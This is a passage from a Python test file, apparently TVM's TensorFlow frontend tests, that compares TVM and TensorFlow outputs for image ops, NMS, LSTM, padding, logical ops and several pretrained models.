shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
""" One iteration of resize nearest neighbor for graph with dynamic input shape """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
""" Resize Bilinear, Nearest_Neighbor """
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastArgs
# -----------
def _test_broadcast_args(in_shape_1, in_shape_2):
""" One iteration of broadcast_args"""
shape_1 = np.array(in_shape_1).astype("int32")
shape_2 = np.array(in_shape_2).astype("int32")
with tf.Graph().as_default():
shape_1 = constant_op.constant(shape_1, shape=shape_1.shape, dtype=shape_1.dtype)
shape_2 = constant_op.constant(shape_2, shape=shape_2.shape, dtype=shape_2.dtype)
tf.raw_ops.BroadcastArgs(s0=shape_1, s1=shape_2)
compare_tf_with_tvm(None, "", "BroadcastArgs:0", opt_level=0)
def test_forward_broadcast_args():
""" Resize Bilinear """
_test_broadcast_args((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_args((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_args((32, 32, 16), [6, 32, 32, 16])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
""" One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
""" One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
""" Resize Bilinear """
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_to_from_tensor((1))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
""" Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
""" Resize Bilinear """
_test_fill((32))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
""" Crop to bounding box """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
""" Crop to bounding box """
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
""" CropAndResize """
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
""" NonMaxSuppressionV3,5 """
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
mode="vm",
)
def test_forward_combined_nms():
""" CombinedNonMaxSuppression """
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
_test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
""" One iteration of a LSTM cell """
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
# in 2.0, tf.contrib.rnn.LSTMBlockCell is removed
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
def _test_pad(input_shape, paddings, mode, **kwargs):
""" One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
""" Pad """
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select, SelectV2
# -------------
def test_forward_where():
""" Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
img = Image.frombuffer("RGB", (600, 600), img_array.tostring(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
import os.path
if not tf.gfile.Exists(os.path.join(img_path)):
tf.logging.fatal("File does not exist %s", img_path)
data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
def test_forward_ssd():
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
# Cell inputs 'c and 'h' consist of all layers values
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).asnumpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).asnumpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
# Create 10 predicted statments of 20 words
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
""" testing local response normalization """
lrn_depth_radius = size / 2
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
